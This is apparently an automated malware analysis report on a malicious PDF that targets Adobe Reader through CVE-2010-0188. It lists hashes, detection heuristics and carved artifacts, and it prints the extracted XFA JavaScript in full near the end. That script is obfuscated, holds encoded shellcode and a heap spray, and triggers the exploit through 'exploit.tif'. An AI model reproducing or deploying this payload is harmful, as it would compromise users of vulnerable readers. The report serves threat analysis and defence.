Malicious PDF — malware analysis report

Static analysis result for SHA-256 c58ece656b7c9f4b…

MALICIOUS

PDF

235.2 KB Created: 2010-02-23 12:29:53 -08:00 First seen: 2026-05-11
MD5: fd7621ea1e576f5cc7d02ac2b120d63b SHA-1: edab368ed5edda0ab6f339a57bb2f2573c248b8e SHA-256: c58ece656b7c9f4b377ee8fc884ba2f5a20340153ef65d8cba319860f1385a3d
408 Risk Score

Malware Insights

MITRE ATT&CK
T1204.002 Malicious Link T1059.001 PowerShell

The sample is a PDF document that contains critical heuristic firings for XFA JavaScript heap-spray exploit code (CVE_2010_0188) and an embedded JS stream. The presence of an XFA heap-spray exploit indicates the document is designed to trigger a vulnerability in Adobe Reader. The PDF also contains embedded files and scripts, suggesting it acts as a dropper for further malicious activity. The document's structure and size are typical of a phishing lure.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9886

Heuristics 15

  • Adobe Reader LibTIFF XFA image exploit — CVE-2010-0188 critical CVE likely CVE_2010_0188
    PDF contains the CVE-2010-0188 exploit template: XFA JavaScript heap-spray setup, a generated TIFF image payload, and assignment of that TIFF data to an XFA image field rawValue to trigger Adobe Reader's LibTIFF parser.
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
  • Adobe Reader JavaScript heap-spray exploit (known CVE family) critical CVE related PDF_JS_KNOWN_CVE_HEAPSPRAY_FAMILY
    PDF JavaScript combines heap-spray staging (NOP-sled / shellcode nybble sled or a multi-kilobyte setTimeOut/setInterval launcher) with the removed Adobe Reader sink getAnnots, associated with CVE-2009-1492. Benign documents never pair heap-spray with these long-removed APIs. The exact malformed argument is assembled at run time, so this attributes the exploit to a known pre-2011 Reader CVE family rather than the exact primitive.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
  • Flate image XObject contains x86 NOP sled high CVE related PDF_FLATE_IMAGE_NOP_SLED
    PDF embeds a FlateDecode image XObject whose decoded bytes are dominated by x86 NOP instructions, alongside form or embedded-file delivery structures. This is exploit payload staging evidence and is related to Adobe Reader parser-exploit families, but it is not a unique CVE fingerprint by itself.
  • XFA JavaScript heap-spray exploit code critical PDF_XFA_HEAP_SPRAY
    PDF contains XFA script content with heap-spray or shellcode-like JavaScript markers such as large encoded word sequences, util.pack, large arrays, or spray variable names. This is a weaponised Adobe Reader exploit pattern, not a normal interactive form.
  • Malformed active-content stream length medium PDF_MALFORMED_EXPLOIT_STREAM_LENGTH
    A PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion/supporting evidence around Reader exploit streams.
  • Image-only document with action trigger (screenshot lure) medium PDF_IMAGE_LURE
    PDF has 2 image(s), only 1 text block(s), carries a click-outward action, and is only 235 KB — typical shape of a phishing lure where a full-page screenshot hides a clickable button that launches or submits to an attacker URL.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded script payload in PDF stream info PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives — common in accessible XFA forms but worth surfacing for analyst review.
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://www.xfa.org/schema/xci/1.0/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-template/2.4/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-data/1.0/Referenced by PDF JavaScript
    • http://www.w3.org/1999/xhtmlReferenced by PDF JavaScript
    • http://ns.adobe.com/xdp/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-locale-set/2.7/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-locale-set/2.1/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-form/2.8/Referenced by PDF JavaScript
🗂 Part of campaign: shared payload 964b35fd2c 29 samples

Extracted artifacts 11

Files carved from inside the sample during analysis.

FilenameKindSourceSize
embedded_file_obj0002.bin pdf-embedded-file PDF EmbeddedFile object 2 at offset 0x19FA 85 bytes
SHA-256: c06dcd026a7ea0536b63e07ce688691b585339a3ab7ff59065e546b56308c7bb
embedded_file_obj0003.bin pdf-embedded-file PDF EmbeddedFile object 3 at offset 0x1AAC 1466 bytes
SHA-256: 0cae1494b9c99505bf126e683a1a8be36bc8d5e793ab829e266d6e2fd62ccac3
embedded_file_obj0004.bin pdf-embedded-file PDF EmbeddedFile object 4 at offset 0x1D6B 9168 bytes
SHA-256: ebf0e9b5ecf5464f669592acf48677cbb689213a1bfc1df711ff40a052636c84
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
embedded_file_obj0005.bin pdf-embedded-file PDF EmbeddedFile object 5 at offset 0x290F 11465 bytes
SHA-256: 5ec8f1fc794dbe13de1158baff72cda0c7fcbc4b3734b087d4e21aedfa6235ba
xfa_image_rawvalue_000.tif pdf-xfa-image-tiff XFA image/rawValue TIFF payload near offset 0x36D6C 8538 bytes
SHA-256: 671a354149e0ee431b9ab639739547a82c1110f751869622d000c6e04bf7d45f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: NOP sled, heap spray 0x0C
xfa_image_rawvalue_001.tif pdf-xfa-image-tiff XFA image/rawValue TIFF payload near offset 0x29A1 8379 bytes
SHA-256: 089f97fbfca09cd255eb4005a30c5f9f2c6d2d3acb4fccb192622ff8e9f738bc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: NOP sled
stream_002_off000003e1.js decompressed-pdf-stream PDF FlateDecoded stream at offset 0x3E1 1532 bytes
SHA-256: f574e4d51594d1a8fd22e125b109b827c437aa898edc78babb62dbb93f8744f8
stream_004_off0000112a.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0x112A 3024 bytes
SHA-256: 8358d835225babc82acbcbbf2cb07512b8fb3772c5b46ff5956d2c6d02da8c39
stream_012_off00002ad7.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0x2AD7 2928 bytes
SHA-256: 226eeacc5eecef2a05ca480f144ff6936594e20b5c7672e8f29f25c8bea65a56
stream_015_off00003110.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0x3110 291 bytes
SHA-256: e65f1e07bc965092b3153e64a1e8777a909cc47a98c0e2a10d38c47def2e6652
embedded_pdf_script_00034a58.bin pdf-embedded-script PDF raw stream script payload at offset 0x34A58 9163 bytes
SHA-256: 964b35fd2cf89dd55c1ec763fabaa19e720fcce510e60402ad1e45eecd2754e0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
<template xmlns="http://www.xfa.org/schema/xfa-template/2.4/" baseProfile="interactiveForms"><subform layout="tb" locale="en_US" name="topmostSubform"><pageSet><pageArea id="PageArea1" name="PageArea1"><contentArea h="792pt" name="ContentArea1" w="612pt" x="0pt" y="0pt"></contentArea><medium long="792pt" short="612pt" stock="custom"></medium></pageArea></pageSet><variables><script contentType="application/x-javascript" name="ADBE::FileAttachmentsCompatibility">/*var v = app.viewerVersion;
if (v &lt; 7)
{
	var n = 0;
	if (this.dataObjects != null)
		n = this.dataObjects.length;
	if (v &gt;= 5 &amp;&amp; v &lt; 6 &amp;&amp; n &gt; 0 &amp;&amp; (app.viewerVariation == "Full" || app.viewerVariation == "Fill-In"))
	{
		if (this.external)
			app.alert("This document has file attachments. To view the attachments, click the Save button to save a copy of the document, open the copy in Acrobat, and use the File &gt; Document Properties &gt; Embedded Data Objects menu.", 3, 0);
		else
			app.alert("This document has file attachments. Use the File &gt; Document Properties &gt; Embedded Data Objects menu to view the attachments.", 3, 0);
	}
	else if (v &gt;= 6 &amp;&amp; v &lt; 7)
	{
		if (n == 0)
		{
			var np = this.numPages;
			syncAnnotScan();
			for (var p = 0; p &lt; np &amp;&amp; n == 0; ++p)
			{
				var annots = this.getAnnots(p);
				if (annots != null)
				{
					for (var i = 0; i &lt; annots.length; ++i)
					{
						if (annots[i].type == "FileAttachment")
						{
							n = 1;
							break;
						}
					}
				}
			}
		}
		if (n &gt; 0)
		{
			if (this.external)
				app.alert("This document has file attachments. To view the attachments, click the black triangle at the top of the document window's vertical scrollbar and choose File Attachments.", 3, 0);
			else
				app.alert("This document has file attachments. Use the Document &gt; File Attachments menu to view the attachments.", 3, 0);
		}
	}
}
*/</script><script contentType="application/x-javascript" name="d">/*var  ____ = unescape;&#xD;
var  _c1 = 				"\x6c\x65\x6e\x67\x74\x68";&#xD;
function _____(__){var _='';for(var ___=0;___&lt;__[_c1];___+=4) _+='%'+'u'+__.substr(___,4);return _;}&#xD;
function 	rep(_	,	__)	{	var ___	=	""	;	while (	--_&gt;=	0) ___	+=	 __	;	return	 ___;}&#xD;
&#xD;
var		 sc=		____		(	_____("9090909090909090EB905E1a5B56068a303c1674E0c04604268aE480020f88c44303EB46E8e9FFe1FFff7466515a70437050707050506B6850644C504B6850776C714D5a6B5850474850794e4453625050705050787551684C4e50506270505050504B686C4f4978574778504978774450616F6f5757785048666C4e775943506C70584e644c615070507070494847544C614F4f574778704866764f5262594b4C67584e446b7150705070506948777470524F6f777768707876457a776150506C67684e544a7170705070707958776474724F4f4767587058664B6f67796D4f6F50584e54496150705070705958476458524F4f476768504856665165767A4f7041786e6458415050707070497867644C626F6f6767785058664F4169675A70684e686e74675150705050504948577450634F6f7767685078565572706b4F4f726c484e64465170505050707968575474636F4f6777587048566C5a48507A4d5667784e74554170707050504948774478536F4f47477850486648494E6f4A584E70586e4474617050505050597857444C734F4f475778504846546749686C6e6959584e64634170505050707958475470544F4f7777785048466E47784d524e5377786e44524170707070705958576444646F6f5757685078564D5a6B494D774F4d784e74417170705070507978674468646F4f577750616F6f677564736363766f46646D7867645046704576454F6f575548547358584f4F6f4447726f4D73707050417070705046674B4e7978477474504978574750466F6f575744707A4670546F4f67654C51794857446C455A7650706A4650704A5670706F6f574770666F4f777548734348584f6F4f44476B546A4670706D786F45505753754F4f475764704F6f57776C656F4f774750564F6f47454C624B684F7450677378696e70414B4857444C4550744148487346644E627A55487675674950514858476470635276507148695154775450526e6C4e6B6e4A417378506c48505948774464517064414848536A74556753566B6455574970717878476470624141505348696144476E50624e4C4e4F6f57776C454F4f774570526F70554842676F6f4F4f6F4f6378706c78507978674458714A767070786650687050707050705A6662705A7670704A465050785670705050707070644F4f477750716F6f47657462497877747476776c67544C466D547A65704950506A5650704D786F55704753557A6664504D486F654C7663756F6f576744666F4f676570634B68777458516B42575454617368586e58506B784F55747170435370637478445368786f50506557474f5A4670504D584F65506763754B584F6548416B524F65444163584B4e687063754F6f475764414F6f576774564F4f574570736F4f474754466F4f476568625A5670506F4f576750714F6f67556C637A5650504F4f4745445475756B684C6e47454B784D7768704B786D754C7066454B6853576C536B4854574E7178574350736f66754B58467750427350734f6343696c697441746D7a4370636c46757373564f4F706E4b70715A73626f74675850414c4E4c6D504350524f50446B4e514f4B534E6f4E455567454e4A756B584B6e6B586A75644273704D6d76564B486C706B744B584A456C5163704D4d6B7864704B586350754c6E454F556D65626c78507050486e476c6D6f4F4f6F6f43464A736C5551764E5255565857757670503030"));&#xD;
&#xD;
function uuu(){&#xD;
_ = rep(128, ____	(_____		("42424242424242424242"))) + sc;&#xD;
_0 = 			____		(	_____("0c0c0c0c"));&#xD;
_1 = 20	+_[_c1];&#xD;
while (_0[	_c1]&lt;_1) _0+=_0;&#xD;
_2	 = 	_0["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 	_1);&#xD;
_3 	=	 _0["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, _0[_c1	]-_1);&#xD;
while(_3[_c1]	 +  _1&lt;0x80000) _3 		= _3+	_3+_2;&#xD;
_4= new Array();&#xD;
for(i=0;i&lt;=192;i=i+1)	_4[i]				=_3		+_;&#xD;
}&#xD;
uuu();*/</script><?templateDesigner expand 1?></variables><subform h="792pt" name="Page1" w="612pt" x="0pt" y="0pt"><break before="pageArea" beforeTarget="#PageArea1"></break><bind match="none"></bind><field h="9.525mm" name="ImageField1" w="150.767mm" x="37.972mm" y="29.655mm"><ui><imageEdit></imageEdit></ui><event activity="ready" name="event__form_ready" ref="$form"><script contentType="application/x-javascript">var  ____ = unescape;
var  _c1 = 				"\x6c\x65\x6e\x67\x74\x68";
function _____(__){var _='';for(var ___=0;___&lt;__[_c1];___+=4) _+='%'+'u'+__.substr(___,4);return _;}
function 	rep(_	,	__)	{	var ___	=	""	;	while (	--_&gt;=	0) ___	+=	 __	;	return	 ___;}

var		 sc=		____		(	_____("9090909090909090EB905E1a5B56068a303c1674E0c04604268aE480020f88c44303EB46E8e9FFe1FFff7466515a70437050707050506B6850644C504B6850776C714D5a6B5850474850794e4453625050705050787551684C4e50506270505050504B686C4f4978574778504978774450616F6f5757785048666C4e775943506C70584e644c615070507070494847544C614F4f574778704866764f5262594b4C67584e446b7150705070506948777470524F6f777768707876457a776150506C67684e544a7170705070707958776474724F4f4767587058664B6f67796D4f6F50584e54496150705070705958476458524F4f476768504856665165767A4f7041786e6458415050707070497867644C626F6f6767785058664F4169675A70684e686e74675150705050504948577450634F6f7767685078565572706b4F4f726c484e64465170505050707968575474636F4f6777587048566C5a48507A4d5667784e74554170707050504948774478536F4f47477850486648494E6f4A584E70586e4474617050505050597857444C734F4f475778504846546749686C6e6959584e64634170505050707958475470544F4f7777785048466E47784d524e5377786e44524170707070705958576444646F6f5757685078564D5a6B494D774F4d784e74417170705070507978674468646F4f577750616F6f677564736363766f46646D7867645046704576454F6f575548547358584f4F6f4447726f4D73707050417070705046674B4e7978477474504978574750466F6f575744707A4670546F4f67654C51794857446C455A7650706A4650704A5670706F6f574770666F4f777548734348584f6F4f44476B546A4670706D786F45505753754F4f475764704F6f57776C656F4f774750564F6f47454C624B684F7450677378696e70414B4857444C4550744148487346644E627A55487675674950514858476470635276507148695154775450526e6C4e6B6e4A417378506c48505948774464517064414848536A74556753566B6455574970717878476470624141505348696144476E50624e4C4e4F6f57776C454F4f774570526F70554842676F6f4F4f6F4f6378706c78507978674458714A767070786650687050707050705A6662705A7670704A465050785670705050707070644F4f477750716F6f47657462497877747476776c67544C466D547A65704950506A5650704D786F55704753557A6664504D486F654C7663756F6f576744666F4f676570634B68777458516B42575454617368586e58506B784F55747170435370637478445368786f50506557474f5A4670504D584F65506763754B584F6548416B524F65444163584B4e687063754F6f475764414F6f576774564F4f574570736F4f474754466F4f476568625A5670506F4f576750714F6f67556C637A5650504F4f4745445475756B684C6e47454B784D7768704B786D754C7066454B6853576C536B4854574E7178574350736f66754B58467750427350734f6343696c697441746D7a4370636c46757373564f4F706E4b70715A73626f74675850414c4E4c6D504350524f50446B4e514f4B534E6f4E455567454e4A756B584B6e6B586A75644273704D6d76564B486C706B744B584A456C5163704D4d6B7864704B586350754c6E454F556D65626c78507050486e476c6D6f4F4f6F6f43464A736C5551764E5255565857757670503030"));

function uuu(){
_ = rep(128, ____	(_____		("42424242424242424242"))) + sc;
_0 = 			____		(	_____("0c0c0c0c"));
_1 = 20	+_[_c1];
while (_0[	_c1]&lt;_1) _0+=_0;
_2	 = 	_0["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 	_1);
_3 	=	 _0["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, _0[_c1	]-_1);
while(_3[_c1]	 +  _1&lt;0x80000) _3 		= _3+	_3+_2;
_4= new Array();
for(i=0;i&lt;=192;i=i+1)	_4[i]				=_3		+_;
}
uuu();
ImageField1.value.image.href = "exploit.tif";

</script></event></field><?templateDesigner expand 1?></subform><?templateDesigner expand 1?></subform><?templateDesigner FormTargetVersion 24?><?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?><?templateDesigner Zoom 95?></template>